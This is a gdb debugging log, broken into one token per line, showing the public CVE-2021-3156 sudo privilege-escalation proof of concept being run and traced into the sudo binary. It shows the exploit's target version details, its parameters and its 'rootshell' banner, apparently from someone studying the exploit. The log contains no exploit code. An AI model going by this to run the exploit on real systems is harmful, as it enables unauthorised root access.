Reading symbols
from
.
/
sudo
-
hax
-
me
-
a
-
sandwich...
(gdb) catch
exec
Catchpoint
1
(
exec
)
(gdb) run
Starting program:
/
home
/
weizi
/
src
/
CVE
-
2021
-
3156
/
sudo
-
hax
-
me
-
a
-
sandwich
1
*
*
CVE
-
2021
-
3156
PoC by blasty <peter@haxx.
in
>
using target: Ubuntu
20.04
.
1
(Focal Fossa)
-
sudo
1.8
.
31
, libc
-
2.31
[
'/usr/bin/sudoedit'
] (
56
,
54
,
63
,
212
)
*
*
pray
for
your rootshell..
*
*
process
2604
is
executing new program:
/
usr
/
bin
/
sudo
Catchpoint
1
(
exec
'd
/
usr
/
bin
/
sudo),
0x00007f2035ec7100
in
?? ()
from
/
lib64
/
ld
-
linux
-
x86
-
64.so
.
2
(gdb)
file
/
usr
/
bin
/
sudo
A program
is
being debugged already.
Are you sure you want to change the
file
? (y
or
n) y
Load new symbol table
from
"/usr/bin/sudo"
? (y
or
n) y
Reading symbols
from
/
usr
/
bin
/
sudo...
Reading symbols
from
/
usr
/
lib
/
debug
/
.build
-
id
/
c4
/
3faca825a3d0bf3541ed8e7c64262105da86d9
.debug...
(gdb) b main
Breakpoint
2
at
0x5574f6222b20
:
file
..
/
..
/
src
/
sudo.c, line
136.
(gdb) c
Continuing.
[Thread debugging using libthread_db enabled]
Using host libthread_db library
"/lib/x86_64-linux-gnu/libthread_db.so.1"
.
Breakpoint
2
, main (argc
=
5
, argv
=
0x7ffc20a88cf8
, envp
=
0x7ffc20a88d28
) at ..
/
..
/
src
/
sudo.c:
136
136
..
/
..
/
src
/
sudo.c: No such
file
or
directory.